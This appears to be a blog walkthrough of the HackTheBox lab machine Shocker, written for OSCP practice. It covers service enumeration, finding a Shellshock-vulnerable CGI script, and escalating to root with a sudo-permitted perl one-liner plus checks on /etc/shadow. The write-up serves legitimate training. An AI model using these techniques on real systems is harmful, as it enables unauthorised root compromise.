Follow along in my OSCP journey, this is my target 5 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.56Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
ORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu
Aggressive OS guesses: Linux 3.12 (95%),We got a Web server and SSH. This probably means that we either have to find credentials/keys for SSH or exploit the web app and get RCE.
WEB— 80
We can see that Gobuster came back with some interesting directories
/cgi-bin/ (Status: 403) [Size: 294]
/cgi-bin/.html (Status: 403) [Size: 299]
/index.html (Status: 200) [Size: 137]
/index.html (Status: 200) [Size: 137]We can see that the Apache version 2.4.18 is a bit old. Let’s look for some vulnerabilities:
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privileg
Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow
Apache mod_cgi - 'Shellshock' Remote Command InjectionLet’s keep those in mind as we progress.
HINT
The machine name, the vulnerabilities found and the folders found all point to the same direction.
.
.
.
.
This has a shell shock feeling to it. Google the vulnerability and get some insight on how to exploit it.
HINT
What would we need to exploit shellshock?
.
.
.
.
We need to find an executable in the cgi-bin directory. It’s time to make our fuzzers work.
Dirbuster
We launch dirbuster but we make sure to add the directory in the URL since we’re looking for a file in that directory. Also, we make sure to add the .sh extension since we’re looking for executables.
We now can use the python exploit. But let’s look at the code
It looks like it’s trying to find typical files that can be used for shellshock. Let’s add ours to the list
Save it and run the exploit!!! The script already starts a listener for us.
And … we get the shell!
Time for some shell upgrade 😉
- python -c ‘import pty; pty.spawn(“/bin/bash”)’
- Ctrl+Z
- stty raw -echo
- fg (nothing will show on the screen, just type enter after the command a couple of times)
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)Really lucky, it seems that our first command comes back with a winner!
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Let’s look at how to start a shell with perl and we should be good. GTFOBins is the easy solution:
Let’s get a root shell a grab the flags.
10.10.10.56>
10.10.10.56> sudo /usr/bin/perl -e 'exec "/bin/sh";'
10.10.10.56> id
uid=0(root) gid=0(root) groups=0(root)10.10.10.56> cd /home/shelly
10.10.10.56> cat user.txt
2e-----------------------------10.10.10.56> cat /root/root.txt
52------------------------------
What did I learn?
- We learned what to look for when facing a server possibly vulnerable to shellshock.
- We learned about GTFOBins and how it can help you quickly exploit executables that can be run with root privileges.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.
